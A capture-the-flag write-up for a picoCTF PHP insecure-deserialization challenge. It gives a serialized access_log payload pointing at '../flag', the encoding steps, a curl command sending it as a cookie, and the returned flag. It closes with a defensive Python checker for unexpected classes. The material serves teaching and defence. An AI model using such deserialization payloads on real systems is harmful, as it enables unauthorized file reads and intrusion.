1. All steps are basically done in Burp Suite. I saw many writeups say that they had to go to `robots.txt`, see `/admin.phps`, and then find that the source code is in `.phps` form, but idk why, when opening the link in the Burp browser, the source code of `index.php` just popped up for me 🤷‍♂️. Anyway, we can see that there's `cookie.php` and `authentication.php`. These two links need an `s` appended so that we can view the source code. (More about `.phps`: https://stackoverflow.com/questions/41689479/what-is-the-file-extension-phps-and-what-is-it-used-for)

2. In `authentication.phps`, there's a line about `$perm` and `cookie.php` that gives access to `admin`.

   ![](https://hackmd.io/_uploads/rJa85R-h2.png)

   In `cookie.phps`, meanwhile, we can see [PHP unserialization](https://hackmd.io/@nataliepjlin/rJ4cjvg2h):

   ![](https://hackmd.io/_uploads/HyDITAWhh.png)

3. The file is stored in `../flag`, and files are accessed with `log_file`, as mentioned in `authentication.phps`.

   ![](https://hackmd.io/_uploads/rJg111G32.png)

   So our payload will be `O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}`

4. Since `cookie.phps` has `$perm = unserialize(base64_decode(urldecode($_COOKIE["login"])));`, we have to base64-encode the payload and then URL-encode it (using Decoder in Burp).

   ![](https://hackmd.io/_uploads/S1-Ikyz23.png)

5. Use [`curl` to send the cookie](https://curl.se/docs/http-cookies.html) (the encoded payload):

   ```shell
   ┌──(kali㉿kali)-[~]
   └─$ curl mercury.picoctf.net:3449/authentication.php --cookie "login=%54%7a%6f%78%4d%44%6f%69%59%57%4e%6a%5a%58%4e%7a%58%32%78%76%5a%79%49%36%4d%54%70%37%63%7a%6f%34%4f%69%4a%73%62%32%64%66%5a%6d%6c%73%5a%53%49%37%63%7a%6f%33%4f%69%49%75%4c%69%39%6d%62%47%46%6e%49%6a%74%39"
   Deserialization error. picoCTF{th15_vu1n_1s_5up3r_53r1ous_y4ll_b4e3f8b1}
   ```
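The root cause in step 4 is that the cookie is unserialized without any restriction on which classes it may name. The following is an added example, not code from the challenge or from this writeup: a small parser for PHP's serialize format that decodes a `login` cookie the way `cookie.phps` does and reports any object class outside an allow-list. The class name `permissions`, its property names, and every function name here are assumptions.

```python
import base64
from urllib.parse import quote, unquote_to_bytes

ALLOWED = {"permissions"}  # assumed name of the one class the app expects

def _until(buf, pos, stop):  # bytes before `stop`, and the position just past it
    end = buf.index(stop, pos)
    return buf[pos:end], end + len(stop)

def _expect(buf, pos, lit):
    if buf[pos:pos + len(lit)] != lit:
        raise ValueError(f"expected {lit!r} at offset {pos}")
    return pos + len(lit)

def _quoted(buf, pos, n):  # a "..." string of exactly n bytes
    pos = _expect(buf, pos, b'"')
    return buf[pos:pos + n], _expect(buf, pos + n, b'"')

def walk(buf, pos, classes):  # parse one value at pos, collect class names, return next pos
    tag = buf[pos:pos + 2]
    if tag in (b"N;", b"b:", b"i:", b"d:"):
        return _until(buf, pos + 1, b";")[1]
    if tag == b"s:":
        n, pos = _until(buf, pos + 2, b":")
        _, pos = _quoted(buf, pos, int(n))
        return _expect(buf, pos, b";")
    if tag in (b"a:", b"O:"):
        pos += 2
        if tag == b"O:":
            n, pos = _until(buf, pos, b":")
            name, pos = _quoted(buf, pos, int(n))
            classes.append(name.decode("latin-1"))
            pos = _expect(buf, pos, b":")
        count, pos = _until(buf, pos, b":{")
        for _ in range(2 * int(count)):  # each entry is a key followed by a value
            pos = walk(buf, pos, classes)
        return _expect(buf, pos, b"}")
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

def unexpected_classes(cookie, allowed=ALLOWED):
    """Decode as cookie.php does (urldecode, base64_decode); list classes not allowed."""
    buf, classes = base64.b64decode(unquote_to_bytes(cookie), validate=True), []
    walk(buf, 0, classes)
    return [c for c in classes if c not in allowed]

def encode(serialized):  # builds the constructed sample cookies below
    return quote(base64.b64encode(serialized.encode()), safe="")

# Constructed samples; the property names in BENIGN are assumptions.
BENIGN = encode('O:11:"permissions":2:{s:8:"username";s:5:"guest";s:8:"password";s:5:"guest";}')
WRITEUP = encode('O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}')  # payload from step 3
```

In PHP itself the same restriction is available through the `allowed_classes` option of `unserialize()`, which keeps a cookie from instantiating a class such as `access_log`.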